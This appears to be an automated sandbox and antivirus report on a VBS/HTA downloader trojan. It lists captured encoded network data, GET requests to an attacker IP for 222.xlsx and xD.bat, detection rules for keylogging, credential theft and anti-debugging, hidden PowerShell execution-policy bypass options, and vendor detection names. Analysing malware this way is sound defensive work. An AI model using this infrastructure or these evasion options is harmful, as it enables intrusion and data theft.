dQUkwjnzobIf3y2CPnv+DgMgpnz6lCDDpUYYFj4CD/58SeZsN3U8m9mqOwa7mS8zK1t+C/2cNDQydgLpJdaYmDQEzTtw8IWM0zwpn8edib3HYUfzruU1+Ali340V22dn/RZ6fxy6dY4ngsgv0VabqfiOeVwxDyoB/Pc/hdfWFULxDr4jWSQHv8Wid6fFKvRlhs5FnqdVxxBvYB2eAQPO8WnCSVTpLgeWb/tahKdFU+rrr/69ARkzFsetvGjZc5O4+r3LuyYuSeMLvMhRa4Yy |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data sent | GET /222.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive |
Data sent | GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287 |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.124 |
file | C:\Users\test22\AppData\Roaming\222.xlsx |
file | C:\Users\test22\AppData\Roaming\xD.bat |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Mozilla Thunderbird\Capabilities\Hidden |
parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" /dde | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\222.xlsx | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\xD.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\xD.bat |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=80) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |